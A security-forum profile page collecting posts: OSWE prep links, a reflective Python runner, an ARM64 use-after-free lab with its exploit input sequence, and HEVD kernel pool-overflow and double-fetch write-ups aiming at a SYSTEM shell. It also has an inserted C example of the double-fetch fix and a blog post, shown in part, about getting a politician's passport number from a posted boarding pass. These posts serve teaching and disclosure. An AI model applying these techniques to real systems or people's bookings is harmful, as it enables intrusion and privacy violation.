Nytro (Administrators)
Posts: 18664, Days Won: 681

Everything posted by Nytro

  1. Whatever they use, in theory it can be done. In practice, this can be extremely difficult and very time-consuming (not counting the skills required). Only if someone on the forum has time; until I finish with RST Con I won't really have time.
  2. Do you mean those LPIC ones? From what I've seen they cover a lot of things and I think they are also fairly well recognized. I mean, they seem very OK to me.
  3. I don't think you need a VPN for bug bounty, you're overcomplicating things, nobody is going to come after you. There are many services; a Romanian one is RoTunneling, by a guy from the forum. I used Hidemyass (I think) in the past for an engagement (at work) and it was OK.
  4. Welcome, if we can help you with anything don't hesitate to ask.
  5. The part with that Gigel guy getting into Zoom is not really a joke. And it shows that Romania is not as technologically adapted a country as people think (seeing that all the kids have smartphones and know how to "install" cracked games). Teachers should also know how to put a password on a Zoom conference. It's OK when it happens in higher grades, but what if it's about younger kids? You never know what shady people might show up.
  6. OSWE/AWAE Preparation
     Jan 22, 2020 (updated) - WebExploit Development - AWAE 1.5 - OSWE Exam Preparation

     This post contains all trainings and tutorials that could be useful for Offensive Security's OSWE certification. I will be updating the post during my lab and preparation for the exam.

     Course Syllabus: https://www.offensive-security.com/documentation/awae-syllabus.pdf

     Before registering for AWAE Lab:
     • Get comfortable with python requests library
     • Read Web Application Hacker's Handbook, again if you already did
     • Get familiar with Burp Suite
     • Get familiar with regex
     • Get hands on with OWASP Top 10 2017 vulnerabilities
     • Vulnerable apps for practice on OWASP
     • PortSwigger Web Security Academy
     • Practice code review skills - OWASP SKF

     Before registering for the OSWE Exam:

     XSS to RCE
     • AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting
     • Chaining XSS, CSRF to achieve RCE
     • Code analysis to gaining RCE
     • Magento 2.3.1: Unauthenticated Stored XSS to RCE
     • MyBB 18.20 From Stored XSS to RCE

     Bypassing File Upload Restrictions
     • [Paper] File Upload Restrictions Bypass
     • Shell the web - Methods of a Ninja
     • Unrestricted File Upload
     • Atlassian Crowd Pre-auth RCE
     • Popcorn machine from HackTheBox
     • Vault machine from HackTheBox

     Authentication Bypass to RCE
     • ATutor 2.2.1 Authentication Bypass
     • ATutor LMS password_reminder TOCTOU Authentication Bypass
     • ATutor 2.2.1 - Directory Traversal / Remote Code Execution
     • Cubecart Admin Authentication Bypass
     • Trendmicro smart protection bypass to RCE

     Password Reset Vulnerability
     • Testing Password reset functionalities
     • OWASP - Forgot Password Cheatsheet
     • How we hacked multiple user accounts using weak reset tokens for passwords

     SQL Injection
     • RCE with SQL Injection - MSSQL
     • SQL Injection to LFI to RCE - MySQL
     • From SQLi to SHELL (I and II) - PentesterLab
     • Pre-Auth Takeover of OXID eShops
     • Blind SQL Injection
     • [Paper] PostgreSQL Injection
     • Having Fun With PostgreSQL
     • Blind Postgresql Sql Injection Tutorial
     • SQL Injection Cheat Sheet - PentestMonkey
     • SQL Injection Cheat Sheet - PayloadAllTheThings
     • Exploiting H2 SQL injection to RCE

     JavaScript Injection
     • Server Side JS Injection
     • Remote Code Execution in math.js
     • Arbitrary code execution in fast-redact
     • NVIDIA GeForce Experience OS Command Injection - CVE-2019-5678
     • SetTimeout and SetInterval use eval therefore are evil
     • Pentesting Node.js Application : Nodejs Application Security
     • NodeJS remote debugging with vscode
     • Escape NodeJS Sandboxes

     PHP Type Juggling
     • OWASP - PHPMagicTricks TypeJuggling
     • PHP Type Juggling - Introduction
     • Type Juggling, PHP Object Injection, SQLi
     • Writing Exploits For PHP Type Juggling
     • Type Juggling Authentication Bypass Vulnerability in CMS Made Simple
     • PHP Magic Hashes
     • Detailed Explanation of PHP Type Juggling Vulnerabilities
     • [Video] PHP Type Juggling Vulnerabilities, Netsparker
     • [Video] Falafel machine from HackTheBox

     Deserialization
     • Deserialization_Cheat_Sheet
     • Insecure deserialization - PayloadAllthethings
     • [Paper] Deserialization Vulnerability
     • Serialization : A Big Threat

     JAVA Deserialization
     • Understanding & practicing java deserialization exploits
     • Understanding JAVA Deserialization
     • Exploiting blind Java deserialization with Burp and Ysoserial
     • Details on Oracle Web Logic Deserialization
     • Analysis of Weblogic Deserialization
     • [Video] Matthias Kaiser - Exploiting Deserialization Vulnerabilities in Java

     .NET Deserialization
     • Use of Deserialization in .NET Framework Methods and Classes.
     • Exploiting Deserialisation in ASP.NET via ViewState
     • Remote Code Execution via Insecure Deserialization in Telerik UI
     • [Video] Friday the 13th: JSON Attacks - BlackHat
     • [Paper] Are you My Type?
     • [Video] JSON Machine from HackTheBox - Ippsec

     PHP Object Injection/Deserialization
     • What is PHP Object Injection
     • phpBB 3.2.3: Phar Deserialization to RCE
     • Exploiting PHP Deserialization
     • Analysis of typo3 Deserialization Vulnerability
     • Attack Surface of PHP Deserialization Vulnerability via Phar
     • [Video] Intro to PHP Deserialization / Object Injection - Ippsec
     • [Video] Advanced PHP Deserialization - Phar Files - Ippsec
     • [Video] Exploiting PHP7 unserialize (33c3)

     NodeJS Deserialization
     • Exploiting Node.js deserialization bug for Remote Code Execution
     • The good, the bad and RCE on NodeJS applications
     • Attacking Deserialization in JS
     • Node.js Deserialization Attack – Detailed Tutorial
     • [Video] Celestial machine from HackTheBox - Ippsec

     XML External Entity (XXE) Attack
     • A Deep Dive into XXE Injection
     • From XXE to RCE: Pwn2Win CTF 2018 Writeup
     • Blind XXE to RCE
     • Apache Flex BlazeDS XXE Vulnerability
     • WebLogic EJBTaglibDescriptor XXE

     Server Side Template Injection (SSTI)
     • [Portswigger Research] Server Side Template Injection
     • [Video] SSTI : RCE For The Modern Web App - albinowax
     • Server Side Template Injection
     • Jinja2 template injection filter bypasses
     • Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic <=3.1.3

     WebSockets InSecurity
     • Introduction to WebSockets
     • [Video] Hacking with Websocket - BlackHat
     • Remote Hardware takeover via Websocket Hijacking
     • Cross-Site WebSocket Hijacking to full Session Compromise

     Source Code Audit
     • Introduction to Code Review [PentesterLab]
     • Static code analysis writeups
     • TrendMicro - Secure Coding Dojo
     • Bug Hunting with Static Code Analysis
     • [Video] Shopify Remote Code Execution - Hackerone
     • Finding vulnerabilities in source code (ASP.NET)
     • A deep dive into ASP.NET Deserialization
     • Writeups by mr_me
     • Youtube Playlist

     Further References/Reviews
     • From AWAE to OSWE the preparation guide - hansesecure
     • OSWE Exam Review 2020 Notes gifts inside - 21y4d
     • OSWE Cheat Sheet - V1s3r1on
     • wetw0rk/AWAE-PREP
     • https://codewhitesec.blogspot.com/
     • https://blog.ripstech.com/
     • https://rhinosecuritylabs.com

     Source: https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/
  7. Zolom

     C# executable with embedded Python that can be used reflectively to run Python code on systems without Python installed.

     Usage:

         zolom.exe --script:"from random import seed; from random import random; seed(1); print 'getting random number'; print random();"
         zolom.exe --b64script:"ZnJvbSByYW5kb20gaW1wb3J0IHNlZWQ7IGZyb20gcmFuZG9tIGltcG9ydCByYW5kb207IHNlZWQoMSk7IHByaW50ICdnZXR0aW5nIHJhbmRvbSBudW1iZXInOyBwcmludCByYW5kb20oKTs="

     Building: using Visual Studio, restore the NuGet packages and then click Build.

     Adding more modules: unzip the Lib.zip file and add your modules, rezip the file and embed it as a resource, finally recompile and your new lib should be available.

     Source: https://github.com/checkymander/Zolom
  8. ARM64 Reversing and Exploitation Part 2 - Use After Free
     SEPTEMBER 6, 2020

     In this blog post, we will be exploiting a Use-after-free vulnerability in the vuln binary. The binaries for this and the next article can be found here. This UaF challenge is based on the one used by Protostar. Use-after-free vulnerabilities occur on the use of heap allocated memory after it has been freed. This can lead to several unexpected behaviours, from a crash to code execution. Anyways, let's get started.

     Copy the vuln binary to your iOS or Corellium device. Run the binary vuln. You get a message that says "Better luck next time". Let's open the binary in Hopper to see what's going on. Let's have a look at the main function. Just like the previous example on Heap Overflow, our objective here is to jump to the useafterfree function. For that, we need to pass in the argument uaf. The function then jumps execution to the function useafterfree:

         ./vuln uaf

     The output shows the address of the user and the customerChat object. We see several commands here; however, on reversing the function, we find there is another hidden command reset that basically frees the user object. This can be confirmed by looking at the code itself:

         #include <stdio.h>
         #include <stdlib.h>
         #include <string.h>

         /* Layout of the user object (the struct is shown again below). */
         struct currentUser {
             char username[0x100];
             char password[4];
         };

         /* Globals whose addresses are printed on every loop iteration. */
         struct currentUser *user = NULL;
         char *customerChat = NULL;

         void useafterfree(char *input) {
             printf("Use after free challenge. Try to log in without entering the password.\n"
                    "Available commands are:\na) username XYZ\nb) login\nc) customerChat XYZ.\n");
             char line[0x400];
             while (1) {
                 printf("{user = %p, customerChat = %p }\n", user, customerChat);
                 if (fgets(line, sizeof(line), stdin) == NULL)
                     break;
                 if (strncmp(line, "username ", 9) == 0) {
                     user = malloc(sizeof(struct currentUser));
                     memset(user, 0, sizeof(struct currentUser));
                     if (strlen(line + 5) < 0x100) {
                         printf("Setting username\n");
                         strcpy(user->username, line + 9);
                     }
                 }
                 if (strncmp(line, "reset", 5) == 0) {
                     printf("Freeing user object\n");
                     free(user);              /* hidden command: user is left dangling */
                 }
                 if (strncmp(line, "customerChat ", 13) == 0) {
                     customerChat = strdup(line + 12);
                 }
                 if (strncmp(line, "currentUser", 11) == 0) {
                     printf("Current user is %s", user->username);
                 }
                 if (strncmp(line, "login", 5) == 0) {
                     if (strncmp(user->password, "BBB", 3) == 0) {
                         printf("You have successfully logged in with password %s!\n", user->password);
                     } else {
                         printf("Please enter your password\n");
                         printf("current password is %s\n", user->password);
                     }
                 }
             }
         }

     We see that the user struct object has an attribute password. This is being checked later on. If the password has three B's, the user gets logged in.

         if (strncmp(user->password, "BBB", 3) == 0) {
             printf("You have successfully logged in with password %s!\n", user->password);
         }

     This is an example of a UaF since the user object can be freed by using the reset command, and then calling if(user->password) will basically trigger the UaF. We can also calculate the size of the user object. The user object is an object of struct currentUser, as can be seen in the following line:

         user = malloc(sizeof(struct currentUser));

         struct currentUser {
             char username[0x100];
             char password[4];
         };

     The size of the user object is 256 + 4 = 260 bytes. If we can free the user object using reset and then overwrite it with the value BBBB such that we are able to overwrite the password property, we might be able to execute a Use-after-free condition and successfully log in.

     Since our objective is to log in, let's try that by first entering the username command:

         $ username admin
         $ login

     Now let's enter the reset command; this will free the buffer. Now let's enter the customerChat command followed by the chat and send 260 B's (so the size of the customerChat object is the same as that of the user object). We keep entering a chat size around the same size as the user so that it can take over the memory address of the freed user object. After some tries, we see that the customerChat address is overlapping the user address; in this case we were able to overwrite the password property of the freed user object with all B's. And hence entering the login command again gives us a success.

     Commands in order:

         username admin
         login
         reset
         customerChat BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
         login

     Source: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
  9. HEVD writeups
     Sep 15, 2020, Yuvaly0

     Intro

     These writeups do not aim to replace all of the existing good places already. I wrote them so I could get a deeper understanding of the vulnerabilities. I've decided to write writeups only for the vulns that interested me the most. There are references to the articles I used in the git repo. At the end of each section, I put a reference to the full source code.

     • Non Paged Pool Overflow
     • Double Fetch

     Non Paged Pool Overflow

     This bug will occur when writing data past the end of a buffer; in this case, the buffer is in the non paged pool. For example, a function receives a buffer and just copies it to its own buffer without checking its length.

     Analysing the binary

     We are interested in the function TriggerNonPagedPoolOverflow. First of all the function creates a chunk using the function ExAllocatePoolWithTag; the requested chunk is of size 0x1f8, its tag will be 'Hack' and it will be allocated in the non paged pool. We're given the information mentioned above and some info on our sent buffer. Next, they use memcpy to copy our buffer with our given size (the vulnerability) to their buffer without any size checking. Lastly, they free the chunk.

     Exploitation

     Our goal is to pop a cmd with system permissions:
     • Derandomize the pool (get to a predictable state) - pool spray
     • Trigger the overflow and overwrite an address with a shellcode address
     • Jump to the shellcode and pop a cmd

     We can't just overwrite the buffer because it will mess up the pool structure and cause a BSOD.

     Derandomize the pool

     We will be using a technique called pool spray. This technique is used to get the pool to a controlled state; this is possible because of its allocator mechanism. But with what objects? We can use the event object; they are each of size 0x40, but if we multiply by 8 we get 0x200, which is the size of our driver's allocated chunk 0x1f8 (+ 0x8 for the _POOL_HEADER struct). The idea is that the first wave will derandomize and the second wave will start in a state where the pool is already derandomized. We could do it in one wave. Some handle addresses, so we could check the state with windbg. We can see that because we freed 8 consecutive chunks, they became one big chunk of size 0x200 (including the pool header).

     Trigger Overflow

     The TypeIndex field in the _OBJECT_HEADER is an index to a table of pointers that will point to different OBJECT_TYPE types. Inside the OBJECT_TYPE, there are a couple of pointers to functions, such as: OkayToCloseProcedure, CloseProcedure. See below. So if we could overwrite the pointer to the table, causing it to point to another index in the table, say the first index, 0, which is a null pointer; because we are operating on Windows 7 we can allocate a null page and simulate the OBJECT_TYPE struct there, giving us the ability to control EIP. But we cannot just overwrite the object header with random data or even some other chunk's metadata because it is unsafe. Because we know that we will overwrite an event object we can take one of our known headers; after all, we know all of them are the same (at least until the Lock field offset, which is 0 anyway).

     Getting system

     Now we need to concat all of our previous steps and run the program: full source code

     Double Fetch

     This kind of bug happens when the user-supplied data is fetched twice. For example, there is an ioctl that receives an array of chars and its length; if the function checks the size and then copies using it (the same reference to the variable), it will expose itself to the double-fetch bug. This is also called TOC-TOU, Time Of Check and Time Of Use: when you are fetching this value for the second time you are exposing yourself to the fact that the user will be able to change this data between the check and the use, thus the vulnerability.

     Analysing the binary

     We are interested in the function TriggerDoubleFetch. First of all the function prints some data for us. Then a check is made, the size that we supplied vs the size of the kernel buffer, to prevent overflow. If we passed the check, our buffer is copied to the kernel buffer using memcpy and the size we sent. Because the function "fetches" the size twice, we have a window of opportunity to change its value. So if we look again at what we can achieve, we can get an OOB (out of bounds) write on the stack.

     Exploitation

     Ok, so we want two things to happen:
     • Change the value before its use and after the check.
     • Jump to an arbitrary address of our choosing.

     So we will run two threads, one that will repeatedly engage with the driver and will trigger the double fetch vulnerability and another to change the value of the size being sent. Ok, let's create two threads and attach our functions. To pop a cmd with system we need to consider something else, like our computer resources. At first, my VM was with one processor; we must think about our OS resources, for example, how many processors do we have? A low number (<4) will give us a hard time when trying to exploit. It took me quite some time to trigger the exploit using two processors. Also, we need to consider the fact that our threads are not alone in the system and we are not even the highest priority in our system. Let's change our threads' priority. And a check to verify the number of processors. Now we can run the exploit with success. Another thing we can do is set each of our threads to a different processor, so it will not be competing with our second thread for the processor resources, where i represents the location of a bit in a bitmask that represents the processor number (i == 0 -> first processor); of course, we will set it by our machine's capabilities or the call will fail. full source code

     updated_at 15-09-2020

     Source: https://yuvaly0.github.io/2020/09/15/hevd-writeups.html
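An added example, not from the HEVD write-up or the HEVD project: the double-fetch pattern the post describes next to the single-fetch fix, in C. The kernel buffer size is a placeholder (the post does not give HEVD's value), and a "fetch" is modelled as a call that can return a different value each time, which is exactly what the racing user thread in the post produces.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Placeholder for the driver's stack buffer size; HEVD's value is not in the post. */
#define KERNEL_BUFFER_SIZE 256

/* Model of the user-mode request. In the real bug the size lives in user
 * memory that a second user thread keeps rewriting while the driver runs;
 * here every read of it (a "fetch") alternates between two values, which is
 * the state a racing thread leaves behind. This is a constructed model. */
struct user_request {
    const char *data;
    size_t size_values[2];   /* value seen on odd / even fetch */
    unsigned fetches;        /* how many times the size has been read so far */
};

static size_t fetch_size(struct user_request *req)
{
    return req->size_values[req->fetches++ & 1];
}

/* Vulnerable pattern (as in TriggerDoubleFetch): the check uses fetch #1,
 * the memcpy uses fetch #2. Returns -1 if rejected, otherwise the number of
 * bytes the driver would copy; more than KERNEL_BUFFER_SIZE means an OOB
 * stack write in the real driver. The demo clamps its own copy so it stays
 * memory-safe while still reporting the unsafe length. */
static long double_fetch_copy(struct user_request *req, char *kbuf)
{
    if (fetch_size(req) > KERNEL_BUFFER_SIZE)        /* fetch #1: time of check */
        return -1;
    size_t used = fetch_size(req);                   /* fetch #2: time of use */
    memcpy(kbuf, req->data, used < KERNEL_BUFFER_SIZE ? used : KERNEL_BUFFER_SIZE);
    return (long)used;
}

/* Fixed pattern: fetch once into a kernel-owned local and use that same
 * value for both the check and the copy, so user mode cannot change it
 * in between. */
static long single_fetch_copy(struct user_request *req, char *kbuf)
{
    size_t size = fetch_size(req);                   /* the only fetch */
    if (size > KERNEL_BUFFER_SIZE)
        return -1;
    memcpy(kbuf, req->data, size);
    return (long)size;
}

/* Scenario from the write-up: the racing thread flips the size between a
 * value that passes the check (16) and one that would overflow (4096).
 * Returns 1 if the driver code under test would write past its buffer. */
static int would_overflow(long (*driver)(struct user_request *, char *))
{
    static char payload[4096];                       /* constructed user data */
    char kbuf[KERNEL_BUFFER_SIZE];
    struct user_request req = { payload, { 16, 4096 }, 0 };
    long n = driver(&req, kbuf);
    return n > KERNEL_BUFFER_SIZE;
}

int main(void)
{
    printf("double fetch overflows: %d, single fetch overflows: %d\n",
           would_overflow(double_fetch_copy), would_overflow(single_fetch_copy));
    return 0;
}
```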
  10. mango.pdf.zone "work" by the hacker known as "Alex" / @mangopdf When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number Do not get arrested challenge 2020 Sep 15, 2020 • mangopdf (Alex Hope) Act 1: Sunday afternoon So you know when you’re flopping about at home, minding your own business, drinking from your water bottle in a way that does not possess any intent to subvert the Commonwealth of Australia? It’s a feeling I know all too well, and in which I was vigorously partaking when I got this message in “the group chat”. A nice message from my friend, with a photo of a boarding pass 🙂 A good thing about messages from your friends is that they do not have any rippling consequences 🙂🙂🙂 The man in question is Tony Abbott, one of Australia’s many former Prime Ministers. That’s him, officer For security reasons, we try to change our Prime Minister every six months, and to never use the same Prime Minister on multiple websites. The boarding pass photo This particular former PM had just posted a picture of his boarding pass on Instagram (Instagram, in case you don’t know it, is an app you can open up on your phone any time to look at ads). The since-deleted Instagram post showing the boarding pass and baggage receipt. The caption reads “coming back home from japan 😍😍 looking forward to seeing everyone! climate change isn’t real 😌 ok byeee” “Can you hack this man?” My friend (who we will refer to by their group chat name, 𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊) is asking whether I can “hack this man” not because I am the kind of person who regularly commits 𝒄𝒚𝒃𝒆𝒓 𝒕𝒓𝒆𝒂𝒔𝒐𝒏 on a whim, but because we’d recently been talking about boarding passes. I’d said that people post pictures of their boarding passes all the time, not knowing that it can sometimes be used to get their passport number and stuff. They just post it being like “omg going on holidayyyy 😍😍😍”, unaware that they’re posting cringe. 
People post their boarding passes all the time, because it’s not clear that they’re meant to be secret Meanwhile, some hacker is rubbing their hands together, being all “yumyum identity fraud 👀” in their dark web Discord, because this happens a lot. So there I was, making intense and meaningful eye contact with this chat bubble, asking me if I could “hack this man”. Surely you wouldn’t Of course, my friend wasn’t actually asking me to hack the former Prime Minister. However. You gotta. I mean… what are you gonna do, not click it? Are you gonna let a link that’s like 50% advertising tracking ID tell you what to do? Wouldn’t you be curious? The former Prime Minister had just posted his boarding pass. Was that bad? Was someone in danger? I didn’t know. What I did know was: the least I could do for my country would be to have a casual browse 👀 Investigating the boarding pass photo Step 1: Hubris So I had a bit of a casual browse, and got the picture of the boarding pass, and then…. I didn’t know what was supposed to happen after that. Well, I’d heard that it’s bad to post your boarding pass online, because if you do, a bored 17 year-old Russian boy called “Katie-senpai” might somehow use it to commit identity fraud. But I don’t know anyone like that, so I just clumsily googled some stuff. Googling how 2 hakc boarding pass Eventually I found a blog post explaining that yes, pictures of boarding passes can indeed be used for Crimes. The part you wanna be looking at for all your criming needs is the barcode, because it’s got the “Booking Reference” (e.g. H8JA2A) in it. Why do you want the booking reference? It’s one of the two things you need to log in to the airline website to manage your flight. The second one is your… last name. I was really hoping the second one would be like a password or something. But, no, it’s the booking reference the airline emails you and prints on your boarding pass. And it also lets you log in to the airline website? 
That sounds suspiciously like a password to me, but like I’m still fine to pretend it’s not if you are. Step 2: Scan the barcode I’ve been practicing every morning at sunrise, but still can’t scan barcodes with my eyes. I had to settle for a barcode scanner app on my phone, but when I tried to scan the picture in the Instagram post, it didn’t work Maybe I shouldn’t have blurred out the barcode first Step 2: Scan the barcode, but more Well, maybe it wasn’t scanning because the picture was too blurry. I spent around 15 minutes in an “enhance, ENHANCE” montage, fiddling around with the image, increasing the contrast, and so on. Despite the montage taking up way too much of the 22 minute episode, I couldn’t even get the barcode to scan. Step 2: Notice that the Booking Reference is printed right there on the paper After staring at this image for 15 minutes, I noticed the Booking Reference is just… printed on the baggage receipt. I graduated university. But it did not prepare me for this. askdjhaflajkshdflkh Step 3: Visit the airline’s website After recovering from that emotional rollercoaster, I went to qantas.com.au, and clicked “Manage Booking”. In case you don’t know it because you live in a country with fast internet, Qantas is the main airline here in Australia. (I also very conveniently started recording my screen, which is gonna pay off big time in just a moment.) Step 4: Type in the Booking Reference Well, the login form was just… there, and it was asking for a Booking Reference and a last name. I had just flawlessly read the Booking Reference from the boarding pass picture, and, well… I knew the last name. I did hesitate for a split-second, but… no, I had to know. Step 5: Crimes(?) youngman.mp4 The “Manage Booking” page, logged in as some guy called Anthony Abbott Can I get a YIKES in the chat Leave a comment if you really felt that. I guess I was now logged the heck in as Tony Abbott? 
And for all I know, everyone else who saw his Instagram post was right there with me. It’s kinda wholesome, to imagine us all there together. But also probably suboptimal in a governmental sense. Was there anything secret in here? I then just incredibly browsed the page, browsed it so hard. I saw Tony Abbott’s name, flight times, and Frequent Flyer number, but not really anything super secret-looking. Not gonna be committing any cyber treason with a Frequent Flyer number. The flight was in the past, so I couldn’t change anything, either. The page said the flight had been booked by a travel agent, so I guessed some information would be missing because of that. I clicked around and scrolled a considerable length, but still didn’t find any government secrets. Some people might give up here. But I, the Icarus of computers, was simply too dumb to know when to stop. We’re not done just because a web page says we’re done I wanted to see if there were juicy things hidden inside the page. To do it, I had to use the only hacker tool I know. Right click > Inspect Element, all you need to subvert the Commonwealth of Australia Listen. This is the only part of the story that might be confused for highly elite computer skill. It’s not, though. Maybe later someone will show you this same thing to try and flex, acting like only they know how to do it. You will not go gently into that good night. You will refuse to acknowledge their flex, killing them instantly. How does “Inspect Element” work? “Inspect Element”, as it’s called, is a feature of Google Chrome that lets you see the computer’s internal representation (HTML) of the page you’re looking at. Kinda like opening up a clock and looking at the cool cog party inside. Yeahhh go little cogs, look at ‘em absolutely going off. Now imagine this but with like, JavaScript Everything you see when you use “Inspect Element” was already downloaded to your computer, you just hadn’t asked Chrome to show it to you yet. 
Just like how the cogs were already in the watch, you just hadn’t opened it up to look. But let us dispense with frivolous cog talk. Cheap tricks such as “Inspect Element” are used by programmers to try and understand how the website works. This is ultimately futile: Nobody can understand how websites work. Unfortunately, it kinda looks like hacking the first time you see it. If you’d like to know more about it, I’ve prepared a short video. Browsing the “Manage Booking” page’s HTML I scrolled around the page’s HTML, not really knowing what it meant, furiously trying to find anything that looked out of place or secret. I eventually realised that manually reading HTML with my eyes was not an efficient way of defending my country, and Ctrl + F’d the HTML for “passport”. oh no Oh yes It’s just there. At this point I was fairly sure I was looking at the extremely secret government-issued ID of the 28th Prime Minister of the Commonwealth of Australia, servant to her Majesty Queen Elizabeth II and I was kinda worried that I was somehow doing something wrong, but like, not enough to stop. ….anything else in this page? Well damn, if Tony Abbott’s passport number is in this treasure trove of computer spaghetti, maybe there’s wayyyyy more. Perhaps this HTML contains the lost launch codes to the Sydney Opera House, or Harold Holt. Maybe there’s a phone number? Searching for phone and number didn’t get anywhere, so I searched for 614, the first 3 digits of an Australian phone number, using my colossal and highly celestial galaxy brain. Weird uppercase letters A weird pile of what I could only describe as extremely uppercase letters came up. It looked like this: RQST QF HK1 HNDSYD/03EN|FQTV QF HK1|CTCM QF HK1 614[phone number]|CKIN QF HN1 DO NOT SEAT ROW [row number] PLS SEAT LAST ROW OF [row letter] WINDOW So, there’s a lot going on here. There is indeed a phone number in here. But what the heck is all this other stuff? 
I realised this was like… Qantas staff talking to eachother about Tony Abbott, but not to him? In what is surely the subtweeting of the century, it has a section saying HITOMI CALLED RQSTING FASTTRACK FOR MR. ABBOTT. Hitomi must be requesting a “fasttrack” (I thought that was only a thing in movies???) from another Qantas employee. This is messed up for many reasons What is even going on here? Why do Qantas flight staff talk to eachother via this passenger information field? Why do they send these messages, and your passport number to you when you log in to their website? I’ll never know because I suddenly got distracted with Forbidden airline code I realised the allcaps muesli I saw must be some airline code for something. Furious and intense googling led me to several ancient forbidden PDFs that explained some of the codes. Apparently, they’re called “SSR codes” (Special Service Request). There are codes for things like “Vegetarian lacto-ovo meal” (VLML), “Vegetarian oriental meal” (VOML), and even “Vegetarian vegan meal” (VGML). Because I was curious about these codes, here’s some for you to be curious about too (tag urself, I’m UMNR😞 RFTV Reason for Travel UMNR Unaccompanied minor PDCO Carbon Offset (chargeable) WEAP Weapon DEPA Deportee—accompanied by an escort ESAN Passenger with Emotional Support Animal in Cabin The phone number I found looked like this: CTCM QF HK1 [phone number]. Googling “SSR CTCM” led me to the developer guide for some kind of airline association, which I assume I am basically a member of now. CTCM QF HK1 translates as “Contact phone number of passenger 1” Is the phone number actually his? I thought maybe the phone number belonged to the travel agency, but I checked and it has to be the passenger’s real phone number. That would be, if my calculations are correct,,,, *steeples fingers* Tony Abbott’s phone number. what have i done I’d now found Tony Abbott’s: Passport details Phone number Weird Qantas staff comments. 
My friend who messaged me had no idea. Tony Abbott’s passport is probably a Diplomatic passport, which is used to “represent the Australian Government overseas in an official capacity”. what have i done By this point I’d had enough defending my country, and had recently noticed some new thoughts in my brain, which were: oh jeez oh boy oh jeez i gotta get someone, somehow, to reset tony abbott’s passport number can you even reset passport numbers is it possible that i’ve done a crime Intermission Act 2: Do not get arrested challenge 2020 In this act, I, your well-meaning but ultimately incompetent protagonist, attempt to do the following things: ⬜ figure out whether i have done a crime ⬜ notify someone (tony abbott?) that this happened ⬜ get permission to publish this here blog post ⬜ tell qantas about the security issue so they can fix it Spoilers: This takes almost six months. Let’s skip the boring bits I contacted a lot of people about this. If my calculations are correct, I called at least 30 phone numbers, to say nothing of The Emails. If you laid all the people I contacted end to end along the equator, they would die, and you would be arrested. Eventually I started keeping track of who I talked to in a note I now refer to as “the hashtag struggle”. I’m gonna skip a considerable volume of tedious and ultimately unsatisfying telephony, because it’s been a long day of scrolling already, and you need to save your strength. Alright strap yourself in and enjoy as I am drop-kicked through the goal posts of life. Part 1: is it possible that i’ve done a crime I didn’t think anything I did sounded like a crime, but I knew that sometimes when the other person is rich or famous, things can suddenly become crimes. Like, was there going to be some Monarch Law or something? Was Queen Elizabeth II gonna be mad about this? My usual defence against being arrested for hacking is making sure the person being hacked is okay with it. You heard me, it’s the power of ✨consent✨. 
But this time I could uh only get it in retrospect, which is a bit yikes. So I was wondering like… was logging in with someone else’s booking reference a crime? Was having someone else’s passport number a crime? What if they were, say, the former Prime Minister? Would I get in trouble for publishing a blog post about it? I mean you’re reading the blog post right now so obviousl Update: I have been arrested. Just straight up Reading The Law It turned out I could just google these things, and before I knew it I was reading “the legislation”. It’s the rules of the law, just written down. Look, reading pages of HTML? No worries. Especially if it’s to defend my country. But whoever wrote the legislation was just making up words. Eventually, I was able to divine the following wisdoms from the Times New Roman tea leaves: Defamation is where you get in trouble for publishing something that makes someone look bad. But, it’s fine for me to blog about it, since it’s not defamation if you can prove it’s true Having Tony Abbott’s passport number isn’t a crime But using it to commit identity fraud would be There are laws about what it’s okay to do on a computer The things it’s okay to do are: If u EVER even LOOK at a computer the wrong way, the FBI will instantly slam dunk you in a legal fashion dependent on the legislation in your area I am possibly the furthest thing you can be from a lawyer. So, I’m sure I don’t need to tell you not to take this as legal advice. But, if you are the kind of person who takes legal advice from mango blog posts, who am I to stand in your way? Not a lawyer, that’s who. Don’t do it. You know what, maybe I needed help. From an adult. Someone whose 3-year old kid has been buying iPad apps for months because their parents can’t figure out how to turn it off. “Yeah, maybe I should get some of that free government legal advice”, I thought to myself, legally. That seemed like a pretty common thing, so I thought it should be easy to do. 
I took a big sip of water and googled “free legal advice”.

trying to ask a lawyer if i gone and done a crime

Before I went and told everyone about my HTML frolicking, I spent a week calling legal aid numbers, lawyers, and otherwise trying to figure out if I’d done a crime. During this time, I didn’t tell anyone what I’d done. I asked if any laws would be broken if “someone” had “logged into a website with someone’s publicly-posted password and found the personal information of a former politician”. Do you see how that’s not even a lie? I’m starting to see how lawyers do it.

Calling Legal Aid places

First I call the state government’s Legal Aid number. They tell me they don’t do that here, and I should call another Legal Aid place named something slightly different. The second place tells me they don’t do that either, and I should call the First Place and “hopefully you get someone more senior”. I call the First Place again, and they say “oh you’ve been given the run around!”. You see where this is going.

Let’s skip a lot of phone calls. Take my hand as I whisk you towards the slightly-more-recent past.

Based on advice I got from two independent lawyers that was definitely not legal advice: I haven’t done a crime. Helllllll yeah. But I mean it’s a little late because I forgot to mention that by this point I had already emailed explicit details of my activities to the Australian Government.

☑️ figure out whether i have done a crime
⬜ notify someone (tony abbott?) that this happened
⬜ get permission to publish this here blog post
⬜ tell qantas about the security issue so they can fix it

Part 2: trying to report the problem to someone, anyone, please

I had Tony Abbott’s passport number, phone number, and weird Qantas messages about him. I was the only one who knew I had these. Anyone who saw that Instagram post could also have them. I felt like I had to like, tell someone about this. Someone with like, responsibilities. Someone with an email signature.
wait but do u see the irony in this, u have his phone number right there so u could just-

Yes I see it thank u for pointing this out, wise, astute, and ultimately self-imposed heading. I knew I could just call the number any time and hear a “G’day” I’d never be able to forget. I knew I had a rare opportunity to call someone and have them ask “how did you get this number!?”.

